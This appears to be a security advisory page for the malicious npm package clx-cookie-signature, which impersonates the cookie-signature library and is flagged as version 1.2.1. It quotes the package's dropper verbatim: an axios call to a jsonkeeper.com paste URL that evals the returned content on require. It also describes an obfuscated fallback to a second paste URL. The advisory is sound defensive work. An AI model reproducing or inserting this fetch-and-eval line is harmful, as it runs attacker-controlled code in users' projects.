Malicious package

clx-cookie-signature (npm)

Malicious code in clx-cookie-signature (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-6141
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall clx-cookie-signature

What this malware does

Package impersonates the popular cookie-signature library (copying its README, author field 'TJ Holowaychuk [email protected]', and sign/unsign API), but index.js adds a top-level dropper that fires the moment the module is required. Specifically, index.js line 16 issues require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => { eval(r.data.content_o); }), eval'ing whatever JSON the author currently hosts at that URL. A helper g() (index.js lines 18-24) decodes hex-encoded strings to reconstruct the tokens 'axios', 'get', 'then' and a second payload URL https://www.jsonkeeper.com/b/HY6M6, providing an obfuscated fallback dropper. Because jsonkeeper.com is a mutable, author-controlled paste host, the author can change the executed code at any time without republishing the package. Any project that installs and require()s clx-cookie-signature — likely as a mistyped substitute for cookie-signature — runs arbitrary attacker code in the consuming process.

Malicious versions

1 flagged
1.2.1

Indicators of compromise (SHA-256)

9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3

Frequently asked questions

Is clx-cookie-signature safe to use?

No. clx-cookie-signature on npm has been identified as a malicious package (version 1.2.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007036

Credits

  • Amazon Inspector · finder

clx-cookie-signature (npm) malicious package — MAL-2026-6141 | O3 Security